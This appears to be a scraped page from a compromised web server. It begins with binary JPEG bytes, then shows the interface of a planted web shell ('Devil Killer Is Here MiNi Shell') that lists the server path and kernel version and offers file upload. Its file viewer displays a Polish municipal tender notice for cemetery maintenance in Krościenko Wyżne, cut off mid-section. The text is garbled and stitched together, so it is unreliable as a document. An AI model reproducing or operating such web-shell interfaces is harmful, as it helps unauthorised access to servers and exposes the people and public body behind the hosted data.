JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060461501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zarządzanie i bieżące utrzymanie cmentarza komunalnego na terenie Gminie Krościenko Wyżne w 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krościenko Wyżne</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440577</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Południowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krościenko Wyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-422</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kroscienkowyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kroscienkowyzne.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zarządzanie i bieżące utrzymanie cmentarza komunalnego na terenie Gminie Krościenko Wyżne w 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9e0f4c1b-f72f-4414-8b1d-be402c415fd0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00604615</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00035999/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Zarządzanie i bieżące utrzymanie cmentarza komunalnego na terenie Gminie Krościenko Wyżne w 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9e0f4c1b-f72f-4414-8b1d-be402c415fd0 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej<br/>rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy<br/>użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl.<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia: numer podany w Rozdziale I SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14. Możliwość korzystania w<br/>postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-<br/>Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do<br/>zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na<br/>Platformie e-Zamówienia.<br/>15. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>16. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>17. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>18. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>19. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@kroscienkowyzne.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parl. Europ. i<br/>Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1;<br/>zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Krościenko Wyżne;<br/>2) administrator powołał Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych (dane kontaktowe: Kacper Sabik,<br/>e-mail: odo@kroscienkowyzne.pl , tel. 13 43151 90 wew. 23)<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 p.z.p.<br/>5) Pani/Pana dane osobowe będą przechowywane w czasie określonym przepisami prawa, zgodnie zprzepisami archiwalnymi tj.<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w<br/>sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawieterminu przechowywania.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych p.z.p., związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego.7) w odniesieniu do Pani/Pana danych<br/>osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z p.z.p. oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa UODO, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest UODO, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WGOŚ.IV.271.3.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa pn. „Zarządzanie i bieżące utrzymanie cmentarza komunalnego na terenie Gminie Krościenko Wyżne w 2025 r.” polegająca na wykonaniu na rzecz Zamawiającego usługi zarządzania i bieżącego utrzymania cmentarza komunalnego na terenie Gminie Krościenko Wyżne położonego przy ul. Południowej składającego się z następujących nieruchomości: część działki o nr ewid. 3952/2, część działki o nr ewid. 3953, część działki o nr ewid. 4002/2, część działki o nr ewid. 3925/1, część działki o nr ewid. 4003, część działki o nr ewid. 3923/1, część działki o nr ewid. 3927/1, część działki o nr ewid. 3922/4, część działki o nr ewid. 3900/2, część działki o nr ewid. 3901/1 oraz działki o nr ewid. 3950, 3951, 3928, 3927/2, 3922/3, 3926, 3924/4, 3922/2 i 3920.<br/>2. Przedmiot umowy w zakresie zarządzania cmentarzem obejmuje w szczególności:<br/>1) wskazywanie miejsc grzebalnych, po wcześniejszym uzgodnieniu z Zamawiającym lub zgodnie z planem zagospodarowania cmentarza (w przypadku posiadania przez Zamawiającego);<br/>2) wywieszenie na tablicach ogłoszeń przy Cmentarzu Komunalnym w Gminie Krościenko Wyżne, na tablicach ogłoszeniowych na terenie gminy oraz na stronie internetowej gminy i cmentarza ogłoszenia o potrzebie zgłaszania się dysponentów grobów;<br/>3) wprowadzanie do systemu informatycznego „grobonet” danych w zakresie dysponentów grobów ustalonych na podstawie informacji uzyskanych w sposób opisany w pkt. 2;<br/>4) przygotowanie pisemnej informacji dla organizatora pogrzebu oraz podmiotów gospodarczych oraz innych osób świadczących usługi cmentarne lub pogrzebowe na terenie cmentarza o wysokości należnej opłaty (zgodnie z zarządzeniem Wójta Gminy Krościenko Wyżne w sprawie ustalenia wysokości opłat cmentarnych na cmentarzu komunalnym w Gminie Krościenko Wyżne) za wykup miejsc pod groby i za korzystanie z urządzeń cmentarnych oraz świadczenie usług cmentarnych i pogrzebowych;<br/>5) weryfikacja wniesienia opłaty, o której mowa w pkt. 4 przed dokonaniem pochówku, za korzystanie z urządzeń cmentarnych oraz przed przystąpieniem do wykonywania usług cmentarnych lub pogrzebowych przez podmioty gospodarcze oraz inne osób świadczące usługi cmentarne i pogrzebowe na terenie cmentarza;<br/>6) pełnienie nadzoru nad działalnością podmiotów gospodarczych oraz innych osób świadczących usługi cmentarne i pogrzebowe na terenie cmentarza;<br/>7) wydanie zezwoleń na wykonanie prac ziemnych, kamieniarskich lub remontowo - budowlanych dla określonego grobu oraz potwierdzanie zgodności ich wykonania z wydanym zezwoleniem;<br/>8) otwieranie i zamykanie bramy cmentarza dla:<br/>a) konduktów pogrzebowych,<br/>b) firm kamieniarskich,<br/>c) dla firm dowożących zwłoki do kaplicy cmentarnej lub chłodni,<br/>d) osób dowożących osoby niepełnosprawne,<br/>e) służb ratunkowych i porządkowych,<br/>f) prokuratury,<br/>g) inspekcji sanitarnej;<br/>9) udostępnianie kluczy do bramy cmentarza, wraz z prowadzeniem pisemnego rejestru wjazdów pojazdami na teren cmentarza przedstawicieli podmiotów wykonujących wyżej opisane usługi, przy czym rejestr ten powinien zawierać: datę i godzinę wjazdu, nazwę (firmę) podmiotu gospodarczego i jego adres;<br/>10) obsługa i bieżące prowadzenie systemu informatycznego „grobonet” w zakresie wprowadzania na bieżąco nowych danych oraz aktualizacji istniejących danych niezgodnych z rzeczywistością;<br/>11) prowadzenie dokumentacji w wersji pisemnej i elektronicznej obejmującej:<br/>a) księgi osób pochowanych na cmentarzu prowadzoną według numeracji narastającej lub w układzie rocznikowym,<br/>b) księgi grobów,<br/>c) alfabetycznego spisu osób pochowanych na cmentarzu, w układzie rocznikowym<br/>- zgodnie z postanowieniami rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 1 sierpnia 2001 r. w sprawie sposobu prowadzenia ewidencji grobów (Dz.U. 2001 nr 90 poz. 1013 ze zmianami);<br/>12) miesięczne sporządzanie i dostarczanie Zamawiającemu sprawozdania z funkcjonowania cmentarza komunalnego, które powinno zawierać:<br/>a) liczbę pochówków:<br/> w nowych miejscach grzebalnych,<br/> w udostępnionych za życia miejscach grzebalnych,<br/> dochowanych do grobów rodzinnych,<br/>b) liczbę wystawionych zleceń płatności zgodnie z obowiązującym Regulaminem cmentarza komunalnego w Krościenku Wyżnym,<br/>c) liczbę ekshumacji,<br/>d) liczbę miejsc grzebalnych, w odniesieniu do których postępowanie windykacyjne jest w toku,<br/>e) liczbę miejsc grzebalnych, za które uregulowano należności po windykacji opłat,<br/>f) ilość wywiezionych odpadów płynnych wraz z poniesionymi kosztami,<br/>g) propozycję zakresu prac nie objętych przedmiotem zamówienia, które wpłyną na poprawę estetyki i funkcjonalności cmentarza;<br/>13) utrzymanie w sprawności technicznej obiektów, urządzeń, instalacji, ogrodzenia i nawierzchni alejek na terenie cmentarza;<br/>14) eksploatacja i utrzymanie w czystości kaplicy cmentarnej;<br/>15) zapewnienie piasku przy nowych kwaterach do uzupełniania zapadającej się ziemi,<br/>16) Wykonawca zapewni jedną kabinę WC oraz jej bieżące opróżnianie wraz z ponoszeniem kosztów z tym związanych;<br/>17) zapewnienie przestrzegania obowiązującego regulaminu cmentarza oraz egzekwowanie jego postanowień wobec osób korzystających z obiektu;<br/>18) zapewnienie osobistej lub przez pracownika obsługi interesantów w lokalu na terenie Gminy Krościenko Wyżne od poniedziałku do piątku w godzinach od 8:00 do 12:00 (Zamawiający zastrzega możliwość zmiany godzin obsługi interesantów);<br/>19) współdziałanie w zakresie kapitalnych remontów cmentarza z Zamawiającym oraz współpraca z wykonawcami w celu zapewnienia niezakłóconego funkcjonowania cmentarza w czasie robót;<br/>20) współpraca z Wojewódzkim Konserwatorem Zabytków dotycząca uznawania mogił (pomników) za zabytki;<br/>21) przyjmowanie interwencji od dysponentów grobów dotyczących spraw cmentarza i załatwianie spraw lub uzgadnianie sposobu ich załatwienia z Zamawiającym;<br/>22) prowadzenie ewidencji opisowej i fotograficznej mogił, które poprzez swój stan techniczny stwarzają potencjalne zagrożenie dla sąsiednich mogił oraz dla zdrowia i życia ludzi, a także zgłaszanie tego faktu Zamawiającemu ;<br/>23) egzekwowanie wykorzystania przez dysponenta należnej powierzchni wokół grobu;<br/>24) Wykonawca zapewni możliwość przyjęcia zwłok do chłodni codziennie w godzinach od 7-17,<br/>25) Wykonywanie innych obowiązków wynikających z przepisów prawa, regulaminów i Zarządzeń Wójta Gminy Krościenko Wyżne.<br/>3. Przedmiot umowy w zakresie utrzymania cmentarzem obejmuje w szczególności:<br/>1) bieżące utrzymanie czystości cmentarza, w tym alejek i chodników na cmentarzu, drogi dojazdowej i parkingu przy cmentarzu oraz terenu wokół kaplicy cmentarnej,<br/>2) systematyczne koszenie trawników na terenie cmentarza – co najmniej ośmiokrotne koszenie w okresie obowiązywania zamówienia wraz z uprzątnięciem i zagospodarowaniem skoszonej trawy przez Wykonawcę,<br/>3) wykaszanie chwastów z pasa zieleni izolacyjnej wokół terenu cmentarza – co najmniej ośmiokrotne koszenie w okresie obowiązywania umowy,<br/>4) odchwaszczanie na bieżąco alejek,<br/>5) wykonywanie prac korekcyjno–pielęgnacyjnych drzew i krzewów, na warunkach określonych w odrębnych przepisach,<br/>6) usuwanie opadłych liści, odśnieżanie i usuwanie lodu oraz śliskości z chodnika i dojazdu do kaplicy cmentarnej oraz głównych alejek na cmentarzu oraz niezwłoczne odśnieżanie i usuwanie lodu oraz śniegu, a także posypywanie piaskiem eliminującym oblodzenie (śliskość nawierzchni) terenu wokół kaplicy cmentarnej,<br/>7) utrzymanie w należytym stanie i poprawa istniejących obrzeży chodnikowych,<br/>8) wyznaczenie miejsca do składowania żywych kwiatów (chryzantem) wraz z późniejszą ich utylizacją.<br/>4. Przekazanie cmentarza komunalnego i dokumentacji związanej z jego zarządzaniem nastąpi z dniem podpisania umowy protokołem zdawczo–odbiorczym stanowiącym integralną część umowy.<br/>5. Wykonawca oświadcza, że zna miejsce, położenie, granice i powierzchnię cmentarza.<br/>6. Realizując czynności, o których mowa w ust. 2 i 3, Wykonawca zobowiązany jest do stosowania przepisów prawa powszechnie obowiązującego, w tym w szczególności wynikających:<br/>1) z ustawy z dnia 31 stycznia 1959 r. o cmentarzach i chowaniu zmarłych (Dz. U. z 2023 r. poz. 887 z późn. zm.),<br/>2) z rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 1 sierpnia 2001 r. w sprawie sposobu prowadzenia ewidencji grobów (Dz.U. 2001 nr 90 poz. 1013 ze zmianami),<br/>3) z rozporządzenia Ministra Infrastruktury z dnia 7 marca 2008 r. w sprawie wymagań, jakie muszą spełniać cmentarze, groby i inne miejsca pochówku zwłok i szczątków (Dz. U. 2008 nr 48 poz. 284).<br/>7. Wykonawca na co najmniej dwa dni robocze przed przystąpieniem do realizacji prac opisanych w pkt 3 ppkt 2 i 3 zobowiązany jest zgłosić za pośrednictwem poczty elektronicznej lub telefonicznie zamiar ich realizacji.<br/>8. Wykonawca zobowiązuje się do wykonania usług zgodnie z opisem przedmiotu zamówienia, postanowieniami umowy i złożona przez siebie ofertą, wedle powszechnie obowiązujących przepisów, a także zasadami bezpieczeństwa i ochrony zdrowia oraz zasadami wiedzy technicznej i ochrony środowiska.<br/>9. Zamawiający oświadcza, że część cmentarza komunalnego na terenie Gminy Krościenko Wyżne (działki nr ewid. 3950 i 3951) stanowi cmentarz zabytkowy ujęty w gminnej ewidencji zabytków prowadzonej przez Wójta Gminy Krościenko Wyżne.<br/>10. Wykonawca będzie zobowiązany ponosić koszty podatków oraz opłat i obciążeń prywatnych oraz publicznoprawnych, związanych z zarządzanymi nieruchomościami i ich eksploatacją, w tym w szczególności podatek od nieruchomości wg stawek uchwalonych przez Radę Gminy Krościenko Wyżne.<br/>11. Przedmiot umowy realizowany przez wykonawcę musi spełniać wymogi dostępności. Zapewnienie dostępności dotyczy w szczególności zgodności z przepisami prawa, w tym zwłaszcza z art. 6 ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2020 r. poz. 1062). Wykonawca zapewnia dostępność poprzez włączanie do zespołów odpowiedzialnych za realizację przedmiotu umowy przedstawicieli wykonawcy wyznaczonych do spraw dostępności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98371111-5 - Usługi utrzymania cmentarzy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy 